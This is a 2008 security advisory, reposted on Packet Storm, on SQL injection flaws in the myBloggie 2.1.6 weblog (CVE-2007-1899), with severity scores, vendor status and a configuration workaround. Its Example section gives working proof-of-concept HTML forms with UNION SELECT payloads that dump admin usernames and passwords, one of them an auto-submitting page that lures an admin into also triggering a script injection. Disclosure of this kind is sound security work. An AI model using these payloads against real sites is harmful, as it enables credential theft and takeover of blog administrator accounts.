exploit the possibilities

mybloggie-sql.txt

mybloggie-sql.txt
Posted Jul 1, 2008
Authored by Jesper Jurcenoks | Site netvigilance.com

myBloggie version 2.1.6 suffers from multiple remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2007-1899
MD5 | e9b34428bf379bf84fc15a1fc314f32b

mybloggie-sql.txt

Change Mirror Download
netVigilance Security Advisory #40

myBloggie version 2.1.6 Multiple SQL Injection Vulnerability
Description:
myBloggie (http://mywebland.com/mybloggie/) is considered one of the
most simple, user-friendliest yet packed with features Weblog system
available to date. Built using PHP & mySQL, web most popular scripting
language & database system enable myBloggie to be installed in any
webservers.
A security problem in the product allows attackers to commit SQL injection.
External References:
Mitre CVE: CVE-2007-1899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899
NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899
OSVDB:

Summary:
myBloggie is weblog system built using PHP & mySQL, the webs most
popular scripting language & database system which enable myBloggie to
be installed in any webserver.

Successful exploitation requires PHP magic_quotes_gpc set to Off and
register_globals set to “On”.
Advisory URL:
http://www.netvigilance.com/advisory0040

Release Date: June 30th 2008

Severity/Risk: Medium

CVSS 2.0 Metrics
Access Vector: Network
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS 2.0 Base Score: 5.1

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: SQL Injection.

SecureScout Testcase ID: TC 17969

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts.
This could be exploited to obtain sensitive data, modify database
contents or acquire administrator’s privileges.

Vendor:
myWebland (http://mywebland.com/)

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.
Workaround:
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off

Example:

SQL Injection Vulnerability 1:
Create html file with the next content:
<html>
<body>
<form
action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser"
method="POST">
<input type="submit" name="user_id" value="1 #' UNION SELECT
CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1
FROM `mb_user` /*">
</form>
</body>
</html>

REQUEST:
Browse this file and click on the button
REPLY:
<tr><td colspan="3" class="spacer6"></td></tr>
<tr><td></td><td></td><td align="right">
<span class="f10pxgrey">Category : <a class="std"
href="?mode=viewcat&cat_id=1">
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN
PASSWORD]</a>
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif"
alt="" />
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |
<img src="./templates/aura/images/trackback.gif" />

SQL Injection Vulnerability 2:

(SQL Injection + XSS Attack Vulnerability)
Create html file with the next content and place it for example on
http://somedomain.com/file.html:
<html>
<body onLoad="document.forms(0).submit();">
<form action="
http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit"
method="POST"> <input type="hidden" name="post_id" value="-1' UNION
SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`),
'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7
FROM `mb_user`#">
</form>
</body>
</html>
REQUEST:
Induce a Mybloggie admin to browse the malicious page.
http:// somedomain.com/file.html

REPLY:
Page containing username and password for Mybloggie admin account.


Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close